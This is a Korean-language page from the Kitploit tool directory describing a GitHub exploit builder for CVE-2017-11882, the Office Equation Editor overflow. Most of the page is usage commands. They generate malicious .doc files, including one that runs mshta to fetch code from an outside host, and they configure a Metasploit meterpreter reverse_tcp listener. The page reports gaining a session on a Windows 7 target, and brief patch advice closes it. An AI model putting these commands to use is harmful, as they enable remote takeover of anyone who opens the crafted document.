Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2017-11882 — CVE-2017-11882(Office 2003~2016 전 버전 대상) | Kitploit
도구/GitHubGitHub/littlebin404/cve-2017-11882
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHublittlebin404/cve-2017-11882

CVE-2017-11882

CVE-2017-11882(Office 2003~2016 전 버전 대상)

저장소 보기
5315년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2017-11882 개요

취약점 악용 효과 측면에서 보면 Office 2003부터 2016까지 모든 버전을 공격할 수 있으며, 전체 공격 환경의 구축도 매우 간단합니다. 이 취약점은 Office 소프트웨어의 [수식 편집기]로 인해 발생합니다. 편집기 프로세스가 이름 길이를 검증하지 않아 버퍼 오버플로(buffer overflow)가 발생하며, 공격자는 특수 문자를 구성하여 임의 코드 실행을 달성할 수 있습니다. 예를 들어, 해커가 이 취약점을 악용하여 셸 백도어가 포함된 Office 파일을 만들면, 일반 사용자가 이 Office 파일을 열 때 컴퓨터가 해커에게 직접 제어될 수 있습니다.

영향을 받는 버전:

root@kitploit:~
office 2003 
office 2007 
office 2010 
office 2013 
office 2016

사용법

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

Image

생성된 “test.doc”를 클릭하면 계산기가 정상적으로 실행됩니다.

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc

Image

Image

11882-3.doc Word 파일이 성공적으로 생성되었습니다.

cve_2017_11882.rb 파일을 /usr/share/metasploit-framework/modules/exploits/windows/smb 디렉터리에 넣습니다:

root@kitploit:~
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882 
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp 
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165 
msf exploit(CVE-2017-11882) > set uripath 11882 
msf exploit(CVE-2017-11882) > exploit

수신 대기 상태를 시작합니다:

Image

win7 타깃 머신의 11882-3.doc 파일을 클릭하여 세션 획득에 성공했습니다!

Image

취약점 수정

① 온라인 업데이트; Windows Update 업데이트를 활성화하십시오. 대부분의 사람들에게는 이 방법이면 충분합니다.

② 패치 적용; 이 취약점에 해당하는 Microsoft 패치 주소: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

도구 다운로드